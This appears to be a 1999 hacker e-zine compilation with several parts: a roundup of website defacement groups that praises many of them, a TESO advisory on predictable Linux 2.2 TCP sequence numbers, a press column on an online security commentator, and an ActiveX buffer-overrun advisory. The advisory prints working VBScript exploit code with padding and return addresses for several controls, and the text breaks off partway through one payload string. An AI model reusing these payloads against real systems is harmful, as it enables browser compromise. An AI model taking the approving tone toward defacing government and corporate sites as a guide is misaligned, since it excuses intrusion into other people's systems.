A few conventions have passed, such as Defcon <http://www.defcon.org>, Defcon <http://www.defcon.org> is probably the most recognized of all hacker conventions, this year some major things happened at this convention, they had a line-up of great speakers, Carolyn P. Meinel showed up and was not allowed in because she was accused of not being a 'real' reporter (which I will not comment on), and shortly into the Defcon <http://www.defcon.org> convention, their website was defaced by the very well know coding group known as ADM. Also Rootfest <http://www.rootfest.org> and the Blackhat Briefings have recently passed by.
Who has showed up?
~~~~~~~~~~~~~~~~~~
Many new groups and individuals have showed up in 1999 up to now. To mention a few. and give a decent description of them and their actions + skills.
Groups : ~~~~~~~
* Forpaxe - Forpaxe showed up in early 99, they have been responsible for hitting a record number of .edu domains also quite a few .gov/.mil and numerous others. They are well known to all hackers and media. A member of the past groups Legion2000 and HcV was a part of this group in the beginning, Iron Lungs, which later got raided by the FBI. Now it appears to just be 2 individuals (m1crochip/in0de) which they state on all of their webpage defacements. They do what they do for a reason, so they are a decent group of individuals as far as I am concerned.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/forpax.html>
* Goat Security - This organization is a definite mentionable, everybody knows and remembers the goat team, it consisted of members of gH, HcV and I think even a few from LoU. They defaced a good amount of websites and made a widely known name for themselves. They definitely knew what they were doing, not like all of the CF(cold fusion) kiddies you see around these days.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/goat.html>
* gH (global Hell) - Possibly the most world wide known hacker group and most media exposed, gH defaced allot of high profile websites such as Macweek <http://www.macweek.com>, Peoples Court <http://www.peoplescourt.com>, The Main Army Page <http://www.army.mil> and the Whitehouse <http://www.whitehouse.gov>. Many members were later raided by FBI agents due to the defacing of the Whitehouse website. They have skill and as far I saw it a very good team of people. This group will always be remembered.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/gh.html>
* Level Seven - This crew was responsible for numerous defacements, it is rumored also and stated on some of their defacements that members of this group were a part of gH (global Hell) and got raided. This group was another group that hacked for a decent reason. Mentionable mostly because of their tie-ins with gH. None the less they are a good group.
Mirrors of their Website Defacements
<http://www.attrition.org/mirror/attrition/l7.html>
* Stonehenge Crew - Not very much to say about this group other than they have a purpose for what they do. They always have a reason for defacing a website they hit. They have done around 14 webpage defacements. It is rumored they are also 'tight' with the known group gH. This is another good group.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/henge.html>
* Keebler Elves - Well, this group is probably the most skilled up to now in 1999. Many skilled individuals, coders and hacker alike in it, from what is said at least. They are best known for their hacks of the <http://www.ed.gov>Department of Education <http://www.ed.gov>, Virgin Records <http://www.virginrecords.com> and the Monmouth Army Base <http://www.monmouth.army.mil>. Probably has done the most recognized sites in 1999. And I wouldn't be surprised if they continue to hack big time names. This group deserves allot of respect. Why? Because they aren't like the rest.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/keebler.html>
* HFD (Hacking for Drunks) - This is another group well known for it's choice of sites to deface. Probably most well recognized for their 20th Century Fox International <http://www.foxintl.com>, Gibson <http://www.gibson.com> and Blair Witch <http://www.blairwitch.com> website hacks. They seem to have a good sense of humor and have done some entertaining defacements. Very good group. But name/logo kind of ripped from HFG(Hacking For Girls) <http://www.attrition.org/mirror/attrition/hfg.html>.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/hfd.html>
* bl0w team - A good Brazilian hackers group, consisting of 5 individuals, best noted for their 2600.co.uk <http://2600.co.uk> and Telemar <http://www.telemar.com.br> hacks. They do it all for an adequate reason and do not give up. I think there patriotism is admirable. They also seem to have a good amount of skill dealing with Solaris/NT systems.
Mirrors of their Website Defacements <http://www.attrition.org/mirror/attrition/bl0w.html>
* INDIANHackers/EHA/Ant1 S3cur1ty Tskf0rc3/MST(Moscow Security Team)
Nothing special, not really even worth the time, they did a 'few' sites and were never heard from again. None of them had really any reason for defacing websites other than to make themselves look big. Ant1 S3cur1ty Taskf0rc3 did a few with reason, but it was rare with these 4 groups.
Mirrors of all the groups defacements :
INDIANHackers
<http://www.attrition.org/mirror/attrition/ndian.html>]
EHA
<http://www.attrition.org/mirror/attrition/eha.html>]
Ant1 s3cur1ty taskf0rce
<http://www.attrition.org/mirror/attrition/asc.html>]
MST
<http://www.attrition.org/mirror/attrition/mst.html>]
-end-
Individuals : ~~~~~~~~~~~
* zo0mer - Hit allot of government/military systems and banks. But it appears he removes data from the boxes after he is done. What would be labeled a malacious script kiddie cracker.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/zoom.html>
* p0gO - Probably best known for his defacing of Time Warner San Diego <http://www.timewarnersandiego.com>. Not to mention his mass hack, he appears to have good skills, also is recognized for his association with irc.psychic.com <http://www.attrition.org/mirror/attrition/psychic.html>.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/pogo.html>
* Xoloth1 - Well known hacker from the Netherlands. Hit some well known porn sites and what would appear to be his spotlight defacement Pentagon.co.yu <http://Pentagon.co.yu>. Xoloth hacks for all the rite reasons.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/xoloth.html>
* v00d00 - First showed up on the scene doing a hack for Psychic <http://www.attrition.org/mirror/attrition/psychic.html>, shortly after doing defacements when he was part of the group Defiance <http://www.attrition.org/mirror/attrition/defiance.html> it appears. He appears to hack for the freedom of Kevin Mitnick <http://www.kevinmitnick.com> AKA Condor and against war, racism and allot of problems that happen in the world these days. He does it for a good cause. That is all there is to say.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/v00.html>
* Mozy - Started hacking for irc.psychic.com, later went individual, noted to be good friends with several known hackers. His defacements are quite humorous if you ask me. Keep it up.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/mozy.html>
* dr_fdisk^ - Extremely well known Spanish hacker and for being in the group Raza Mexicana <http://www.attrition.org/mirror/attrition/raza.html>. Most well known for compromising such sites as Nic.bo and HBO, Latin America <http://www.hbo-latinamerica.com>. Another hacker that does it for the freedom of Kevin Mitnick <http://www.kevinmitnick.com> and many other reasons.
Mirror of all his/her hacks <http://www.attrition.org/mirror/attrition/fdisk.html>
There are other individuals I missed and they all deserve respect and to be noticed, I didn't for get them because I dislike them, just because this part of the article has gone far enough.
What was hit? ~~~~~~~~~~~~
Aside from all the no-name sites that were hacked. In 1999 there has been several HIGH PROFILE web defacements. Below is a list with a link to the defaced site, provided by Attrition <http://www.attrition.org>.
* Klu Klux Klan <http://www.attrition.org/mirror/attrition/net/www.kukluxklan.net/>
* LOD Communication <http://www.lod.com>
* 200cigarettes Movie <http://www.attrition.org/mirror/attrition/com/www.200cigarettes.com/>
* Whitepride <http://www.attrition.org/mirror/attrition/com/www.whitepride.com/>
* No Limit Records <http://www.attrition.org/mirror/attrition/com/www.nolimitrecords.com/>
* Hotbot Search Engine <http://www.attrition.org/mirror/attrition/com/www.hotbot.com/>
* Summercon <http://www.attrition.org/mirror/attrition/org/www.summercon.org/>
* eBay <http://www.attrition.org/mirror/attrition/com/ebay.com/>
* Coca Cola (BE) <http://www.attrition.org/mirror/attrition/misc/www.cocacola.be/>
* US Senate <http://www.attrition.org/mirror/attrition/gov/www.senate.gov/>
* HBO, Latin America <http://www.attrition.org/mirror/attrition/com/www.hbo-latinamerica.com/>
* The White House <http://www.attrition.org/mirror/attrition/gov/www.whitehouse.gov/>
* Army Main Site <http://www.attrition.org/mirror/attrition/mil/www.army.mil/>
and so many more.... <http://www.attrition.org/mirror/attrition/>
Why do they do it? ~~~~~~~~~~~~~~~~~~
MOST of the time it is to make a name and become known/noticed, but on some occasions people do it for a reason, to prove faulty security, to protest against a certain problem in the world or a personal dispute.
Well that pretty much covers 1999. Most of the remembered parts up to now anyways.
Thanks allot,
I prefer to remain anonymous.
Sites to check out :
Rootshell <http://www.rootshell.org>, Attrition <http://www.attrition.org>, HNN <http://www.hackernews.com> and OSAll <http://www.aviary-mag.com>
Written by anonymous for HNS (www.net-security.org <http://www.net-security.org>)
3. V U L N E R A B I L I T Y S
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Linux Kernel 2.2.x ISN Vulnerability
- 1.1 Systems Affected
- 1.2 Tests
- 1.3 Impact
- 1.4 Explanation
- 1.5 Solution
- 1.6 Acknowledgments
- 1.7 Contact Information
- 1.8 References
- 1.9 Exploit
1. Linux Kernel 2.2.x ISN Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TESO Security Advisory
26/09/1999
Linux Kernel 2.2.x ISN Vulnerability
Summary: A weakness within the TCP stack in Linux 2.2.x kernels has been discovered. The vulnerability makes it possible to "blind-spoof" TCP connections. It's therefore possible for an attacker to initiate a TCP connection from an arbitrary non existing or unresponding IP source address, exploiting IP address based access control mechanisms. Linux 2.0.x kernels were tested against this attack and found not to be vulnerable in any case.
1.1 Systems Affected ~~~~~~~~~~~~~~~~~~~~
All systems running the kernel versions 2.2.x of the Linux operating
system. Linux 2.3.x systems may be affected, too, we didn't tested
this versions.
In our test situations we noticed that it doesn't seem to matter
whether the TCP syncookie functionality was enabled or not (enabled
within the kernel and activated through the proc filesystem options).
1.2 Tests
~~~~~~~~~
This is the beginning of a log of a successfully mounted blind TCP
spoofing attack agains a Linux 2.2.12 system.
(tcpdump output formatted for better readability)
16:23:02.727540 attacker.522 > victim.ssh : S 446679473: 446679473(0)
16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0)
16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473: 446679473(0)
16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:03.014941 attacker.522 > victim.ssh: R 446679474: 446679474(0)
16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318
16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0)
16:23:06.554958 11.11.11.11.522 > victim.ssh: . ack 3929855319
16:23:06.555119 victim.ssh > 11.11.11.11.522: R 3929855319:3929855319(0)
16:23:06.637731 11.11.11.11.522 > victim.ssh: . ack 3929855320
16:23:06.637909 victim.ssh > 11.11.11.11.522: R 3929855320:3929855320(0)
...
The first ISN of the victim's host is 3929852318, which is within a SYNACK packet to the attackers host. This is unspoofed and can be easily snagged by the attacker. At the same time the attacker sent out the first unspoofed SYN packet he sent a spoofed SYN packet from 11.11.11.11 too. This packet is answered by the victims host too with the ISN of 3929859164. The difference between the first visible ISN and the second ISN is only (3929859164-3929852318) = 6846. Please notice that all TCP and IP parameters of the spoofed packet, except for the IP source address are the same as of the unspoofed packet. This is important (see below).
This small differences within the initial TCP sequence number (ISN) is
exploitable. In other tests, where both hosts were unlagged we even had
differences below 500 sometimes. We've managed to successfully blind spoof TCP connections on different Linux 2.2.x systems, that is reaching the TCP "ESTABLISHED" state without being able to sniff the victim host.
1.3 Impact
~~~~~~~~~~
By sending packets from a trusted source address, attackers could possibly bypass address based authentication and security mechanisms.
There have been similiar exploiting technics, aimed especially at r* and NFS services, in the past that demonstrated the security impact of weak ISNs very well. We have written a working exploit to demonstrate the weakness.
1.4 Explanation
~~~~~~~~~~~~~~~
The problem relies on a implementation flaw within the random ISN algorithm in the Linux kernel. The problem is within drivers/char/random.c, line 1684: __u32 secure_tcp_sequence_number(__u32 saddr, __u32 daddr, __u16 sport, __u16 dport)
{
...
static __u32 secret[12];
...
secret[0]=saddr;
secret[1]=daddr;
secret[2]=(sport << 16) + dport;
seq = (halfMD4Transform(secret+8, secret) &
((1<<HASH_BITS)-1)) + count;
...
}
As already said, in our spoofed TCP SYN packet only the IP source address differs, that is only secret[0], so of 12*4 random bytes used to create the sequence number from, only 4 bytes differ. Obviously the hash created by halfMD4Transform has similarities if the source and destination ports and the destination address are the same. It seems that the src-adress is least-significant to the above MD4 algorithm. Changing the source-ports too, makes the 2 ISNs more differ. Due to the short gap of time, the last seq += tv.tv_usec + tv.tv_sec*1000000;
is useless. This may be the reason why this bug may have survived long:
In any real network situation it is uncommon that the source and
destination ports are equal in two different connections on one host.
Further analyzation of the hash algorithm in this routine may result in a better ISN prediction than the one we use (range prediction).
1.5 Solution
~~~~~~~~~~~~
First: It's always unwise to rely on address based authentication,
because in a sniffable enviroment, such as the Internet, there
are always means of bypassing address based authentication.
Second: The press shouldn't hype this as _THE_ Linux bug.. everyone having looked at the ISNs/DNS Sequence numbers of any of Microsoft's
operating systems knows that their 'random numbers' are _much_
easier targets to use for IP and DNS spoofing attacks. For a
a description how the ISN numbers of the Microsoft Windows NT
TCP stack have even weakened with the latest Service Packs, you
may want to browse the latest postings to the Bugtraq security
mailing list [1] or read [2]. Well.. not that it matters.. but who uses Microsoft software anyway ?
The Linux kernel developers have been notified at the same time as the
public Linux community, so a safe patch should be available real soon.
1.6 Acknowledgments
~~~~~~~~~~~~~~~~~~~
The bugdiscovery and the exploit is due to:
Stealth <http://www.kalug.lug.net/stealth>
S. Krahmer <http://www.cs.uni-potsdam.de/homepages/students/linuxer>
This advisory has been written by typo and scut.
The tests and further analyzation were done by stealth and scut.
The demonstration exploit has been written by S. Krahmer.
1.7 Contact Information
~~~~~~~~~~~~~~~~~~~~~~~
The teso crew can be reached by mailing to The teso crew can be reached by mailing to teso@shellcode.org. Our webpage is at <http://teso.scene.at/>
1.8 References
~~~~~~~~~~~~~~
[1] Mail to the Bugtraq mailing list
From: Roy Hills <bugtraq-l@NTA-MONITOR.COM <mailto:bugtraq-l@NTA-MONITOR.COM&replyto=Pine.LNX.4.10.9909270031050.23786-100000@localhost.localdomain&subject=Re:%20[EuroHaCk]%20Linux%202.2.x%20ISN%20vulnerability%20(fwd)>>
Subject: NT Predictable Initial TCP Sequence numbers - changes observed
with SP4
[2] Microsoft Knowledge Database Article
ID: Q192292 "Unpredictable TCP Sequence Numbers in SP4".
[3] libUSI++, a spoofing library
<http://www.cs.uni-potsdam.de/homepages/students/linuxer/>
[4] TESO
<http://teso.scene.at/>
[5] S. Krahmer
<http://www.cs.uni-potsdam.de/homepages/students/linuxer>
1.9 Exploit
~~~~~~~
We've created a working exploit to demonstrate the vulnerability.
The exploit needs libUSI++ installed, which can be obtained through [3]. The exploit is available from either
<http://teso.scene.at/>
or <http://www.cs.uni-potsdam.de/homepages/students/linuxer/>
------
4. R E A D I N G M A T E R I A L
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Books:
- Mastering Network Security -<http://www.amazon.com/exec/obidos/ASIN/0782123430/netsecurity>
Do you need to secure your network? Here's the book that will help you implement and maintain effective network security, no matter what size your network is or which NOS you're using. Packed with practical advice and indispensable information, this book systematically identifies the threats that your network faces and explains how to eliminate or minimize them. Covers all major network operating systems -- NT, NetWare, and Unix -- and all aspects of network security, from physical security of premises and equipment to anti-hacker countermeasures to setting up your own Virtual Private Networks. The CD includes evaluation and demonstration versions of commercial firewalls, intrusion detection software, and a complete security policy.
- Cisco IOS Network Security - <http://www.amazon.com/exec/obidos/ASIN/1578700574/netsecurity>
Divided into five sections, the stage is set in the book's first chapter on security fundamentals. Cautioning against a slapdash approach, the authors offer pointers on developing and implementing a security policy for your organization. Heavily promoted is Cisco's Authentication, Authorization, and Accounting (AAA) security framework. Authentication lets you identify your users, authorization lets you decide what they can and can't have access to, and accounting lets you know what processes users are running and how much of the network's resources they are consuming. Cisco's team maintains that the AAA system forces you to keep a tight rein on your network, ultimately resulting in a more secure environment.
- Cryptography and Network Security : Principles and Practice -
<http://www.amazon.com/exec/obidos/ASIN/0138690170/netsecurity>
KEY BENEFIT: This book presents detailed coverage of network security technology, the standards that are being developed for security in an internetworking environment, and the practical issues involved in developing security applications. KEY TOPICS: Opening with a tutorial and survey on network security technology, Stallings provides a sound mathematical foundation for developing the algorithms and results that are the cornerstone of network security. Each basic building block of network security is covered, including conventional and public-key cryptography, authentication, and digital signatures, as are methods for countering hackers and other intruders and viruses. The balance of the book is devoted to an insightful and thorough discussion of all the latest important network security applications, including PGP, PEM, Kerberos, and SNMPv2 security. Now in its Second Edition, the book has been completely updated, reflecting the latest developments in the field.
- Internet Security : Professional Reference - <http://www.amazon.com/exec/obidos/ASIN/156205760X/netsecurity>
Internet Security covers far more material than most other books on the subject, but--inevitably--in less depth. You'll find chapters on daemons, Unix-to-Unix copy (UUCP), audit trails, spoofing and sniffing, SATAN, Kerberos, encryption and PGP, Java, CGI, and viruses. Encompassing such a broad range of material in detail is risky, and this book suffers from several gaps. For example, the subject of electronic commerce goes untouched, with no mention of payment-specific schemes such as CyberCash or protocols such as Secure Electronic Transaction (SET). For those topics that are included, the level of depth varies considerably: Some topics are covered by well-written overviews, others by listing the programs' parameters in excruciating detail, and still others by simplistic tutorials that seem out of place in a technical volume. In addition, there are topics such as encryption, which are scattered across many sections.
<multisync> i got multitasking skills so i am sex0ring and chatting at the same time
copyright (c) SLa5H ,member of HWA.hax0r.news
@HWA
15.0 Forbidden Knowledge #7 is being released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[15:50] <wyze1> FK7 haz da following 1nph0z3: Summary of the new telecommunications act,
Windows NT low level security features and how they interact with virtual memory and
process management, Use and Abuse of offline internet access services, Defeating portscan
detection, An introduction to using gawk, Some serious commentary on the government and on
the hacking scene, A Mass Fake Portscanner, A Mass CGI Vulnerability Scanner with Wingate
Support, A PortSentry Scanner and more...
@HWA
16.0 The 'real' story behind JP and PSS as per Forbes magazine...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Via PSS
http://www.forbes.com/columnists/penenberg/
Go head and sue!
IT'S A SAD FACT, but whenever someone is cited as an expert in
one publication, he is almost sure to be quoted in another--and
another and another. The reason is simple: The first thing a journalist
does when beginning a story is to see what else has been written on
the topic. Culling sources from other news articles is a good way
to get started.
The problem is, few reporters check out these "experts," figuring that if
a source made it into, say, The New York Times or The
Washington Post, he must be reliable and, well, expert. Think of it
as an extension of Howard Stern's media strategy. Stern once said he
himself first coined the term "King of All Media," figuring that the
mainstream press would then start to
call him that. (It did.)
How else to explain the schizophrenic emergence of
twenty-year-old John Vranesevich, founder and
operator of antionline.com, a web site that purports to
follow the hacker scene. In the realm of mass media,
"JP" has become a star, a youthful public figure who
has been quoted extensively for his computer-security
expertise and inside knowledge of the hacking world.
But in hacker circles he is a pariah. Perhaps only his
close ally, Carolyn Meinel (a.k.a. "The Happy
Hacker"), inspires more vitriol. At this year's Defcon,
the hacker conference held in Las Vegas, Meinel had
the dubious honor of being bodily ejected from the
convention hall.
It's hard to gauge just how elite JP's hacker and
computer-security skills are. But we do know his web
site was taken down in August when someone with an
account in Russia tricked AntiOnline into downloading
software that redirected its visitors to another site. The
hacker, obviously not a fan of JP's, included this
message: "Expensive security systems do not protect
from stupidity."
And online columnist Lew Koch, of CyberWire
Dispatch, interviewed JP at length, exposing vast gaps
of knowledge. For instance, Koch questioned JP about
AntiOnline's alleged scoop of the hack of an atomic
research center last year, yet he couldn't remember
which country housed the center. JP kept insisting it
was Israel, and, according to Koch, called the
Bombay Atomic Research Center the "B'Hadvah
Atomic Research Center." When Koch corrected him,
JP admitted it must have been India. JP also claims
he has "semi-contractual" relationships with NASA
and the Defense Informations Systems Agency
(DISA), yet Koch says both agencies deny this.
But the mass media appears ignorant of this. The New
York Times turned to Vranesevich when it needed
comment on a rash of anti-government hacks, while
The Wall Street Journal Europe dubbed him an
"online-security specialist." The Baltimore Sun asked
for his opinion on the hack of the Johns Hopkins'
medical school site. The Orange County Register
invited him to bash hacker/martyr Kevin Mitnick, which
he did with glee, saying that hackers don't have a clue
about Mitnick's case, they "just heard it's cool to
support Mitnick, and that is what they do." And the
San Diego Union-Tribune dialed him up to ask about
the threat of computer viruses.
Of course, JP has nothing against good press. It's the
bad press that let's him unsheath his sharpest
weapon. No, not the facts; those would only get in the
way. We're talking about the threat of a lawsuit.
In June, JP contacted Harvard University to complain
about a computer-security web site rival called
PacketStorm, which had posted some nasty pictures,
along with even nastier commentary. Harvard, afraid of
a lawsuit, pulled the site, which was a favorite of
computer-security professionals. JP claims on his web
site that he didn't explicitly threaten lawsuit, but the
University certainly took it that way. A Harvard
spokesman told me this was the first time Harvard had
ever pulled the plug on a site for "objectionable
material." (Eventually, PacketStorm found a home with
Kroll-O'Gara, the big-time detective agency in New
York.)
Then in July, The Ottawa Citizen ran a story about JP,
reporting allegations that JP is under investigation by
the FBI for "employing hackers to target high-profile
sites in order to scoop the rest of the media with
exclusive reporting." Vranesevich contacted the
newspaper and threatened to sue. Although Mark
Anderson, The Citizen's high tech editor, said he was
confident in the story, the FBI would not comment
whether it was in fact investigating JP or not, even
though several other sources in the know insisted he
was. As a result, the Citizen removed the story from
its web site, rather than face a potential lawsuit.
"It's sad," Anderson says. "You're confident you have
reliable information, but the threat of a lawsuit forces
you to pull your story. The onus was on us to prove
that Vranesevich is under investigation by the FBI, but
the FBI wouldn't say it outright. Since Canadian libel
law is tougher than American libel law, we felt we had
no choice."
In addition, folks trolling around cyberspace say that
Vranesevich has threatened them with lawsuits
whenever they post anything negative about him on
their web sites. I wonder what he would do if someone
actually took him up on this, since lawyers are
expensive and, by all accounts, JP's business is far
from being a cash cow. Perhaps, after reading this,
he'll even sue me.
@HWA
17.0 ActiveX Buffer Overruns Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer: I'm not responsible for anything, unless it's
good.
This advisory outlines several buffer overruns in several
controls, and the vulnerability of ActiveX controls to
buffer overrun attacks in general. It appears that the
ActiveX/OLE/COM technology in general does no buffer checks
before passing parameters to controls, leaving the checking
up to the control in question. Hence, many poorly written
controls are individually susceptible to buffer overrun
attacks, independent of the environment they are controlled
from, and other controls on the system. The following
controls are probably just a few of the vulnerable controls
which are in common use, including one control from a third
party vendor (Adobe). Because these controls are marked as
safe for scripting, they may be exploited through IE
through a web page, E-mail, or anywhere else where 'safe'
ActiveX controls may be scripted (ie some newsgroup readers
and other E-mail clients)
Known Affected Controls:
Acrobat Control for ActiveX - PDF.OCX v1.3.188
Setupctl 1.0 Type Library - SETUPCTL.DLL v1, 1, 0, 6
EYEDOG OLE Control module - EYEDOG.OCX v1.1.1.75
MSN ActiveX Setup BBS Control - SETUPBBS.OCX v4.71.0.10
hhopen OLE Control Module - HHOPEN.OCX v1, 0, 0, 1
RegWizCtrl 1.0 Type Library - REGWIZC.DLL v3, 0, 0, 0
Each control contains at least one method, which does
incorrect handling of strings, and when manipulating a
string too large, a classic buffer overrun can occur,
allowing arbitrary code to be executed on the client.
Protection:
Microsoft has been notified of these exploits around a
month ago, and is releasing a patch to revoke the hhopen,
regwiz and setupctl controls, and a previous patch has been
released for Eyedog. For the other controls, and any others
found to be vulnerable, see Microsoft knowledge base
article Q240797 on how to stop an ActiveX control from
running in IE. If pain persists, disable ActiveX scripting
altogether in IE.
How to Stop an ActiveX Control from Running in Internet
Explorer
http://support.microsoft.com/support/kb/articles/q240/7/97.a
sp
Details:
For each exploit, we have full control of the RET address,
knowing where to RET to in order to execute our code is
easier for some controls than others. For the controls
where no known fixed or referenced location of the code can
be found, I will simply RET to ExitProcess, although it is
still possible but more difficult to execute arbitrary
code. For the exploits which are easy to RET to the code, I
will demonstrate how to execute a program (CALC.EXE) using
fixed API locations in Win98, you will need to modify these
addresses depending on the versions in use. For the
exploits, similar to a couple other Win exploits, a JMP ESP
is required to get to the code. I didn't manage to find one
in Kernel32 or IExplore, however there does appear to be
one in Shell32 (version 4.72.3110.6) at (7FD035EB), you
will also need to modify this address depending on your
version. So if you get a crash at around this address, then
it is most likely possible to run the exploit, the address
just needs to be changed. It should be noted that arbitrary
code may be executed, not just running a program, this is
just an example. Also, I haven't tried posting HTML to this
forum before, so hopefully it will turn out ok, if not,
could the moderators please convert the HTML to plaintext
or something.
============================================================
EYEDOG:
With this control, MSInfoLoadFile is the offending method.
There is no easy way to RET to our code, so instead, I have
shown how to simply RET to ExitProcess directly. This will
cause the host to terminate.
<object classid="clsid:06A7EC63-4E21-11D0-A112-00A0C90543AA"
id="eye"></object>
<script language="vbscript"><!--
msgbox("EYEDOG OLE Control module Buffer Overrun (Local
Version)" + Chr(10) + "Written by Shane Hird")
'Padding for the exploit
expstr
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess, BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Call exploitable method (MSInfoLoadFile)
eye.MSInfoLoadFile(expstr)
--></script>
============================================================
HHOPEN:
This control is a little more difficult to exploit, as the
RET address is in the middle of the string, and once again
there is no easy way to RET to our code, so I have RET'd to
ExitProcess directly instead. In this case, OpenHelp is the
vulnerable method, and the exploit is possible when the
method is called with a valid help file, and a long Help
Section.
<object
classid="clsid:130D7743-5F5A-11D1-B676-00A0C9697233"
id="hhopen"></OBJECT>
<script language="vbscript"><!--
msgbox("hhopen OLE Control Module Buffer Overrun" + Chr(10)
+ "Written By Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'Where the RET address appears to be, RET to ExitProcess
(BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'Extra padding to trigger the overrun
expstr = expstr
+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA"
'Call exploitable method, note the valid help file
hhopen.OpenHelp "Winhlp32.hlp", expstr
--></script>
============================================================
SETUPBBS:
When this control is initialised, it will display a prompt
notifying the user that the control is capable of modifying
Mail and News configuration etc and asks the user whether
he/she wishes the control to proceed. This control is
exploitable through two different methods, vAddNewsServer
and bIsNewsServerConfigured. I have simply RET'd to
ExitProcess with this exploit, although there are other
possibilities.
<object
classid="clsid:8F0F5093-0A70-11D0-BCA9-00C04FD85AA6"
id="setupbbs"></OBJECT>
<script language="vbscript"><!--
msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written
by Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
